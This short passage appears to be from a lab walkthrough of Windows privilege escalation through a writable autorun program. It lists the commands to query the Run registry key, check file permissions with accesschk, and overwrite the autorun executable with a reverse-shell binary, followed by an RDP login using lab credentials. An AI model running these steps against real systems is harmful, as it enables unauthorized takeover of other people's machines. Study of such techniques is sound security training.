as we see we have auto run

now let’s enumerate this manually

reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

as we see we got this program.exe so let’s check it’s permissions

accesschk.exe /accepteula -wvu "C:\\Program Files\\Autorun Program\\program.exe"

now as we see the everyone have read and write access to this file so let’s go and replace it with a reverse shell

copy C:\\PrivEsc\\esc.exe "C:\\Program Files\\Autorun Program\\program.exe" /Y

now let’s start a new rdp session with the username admin and password password123

as we see we are admin now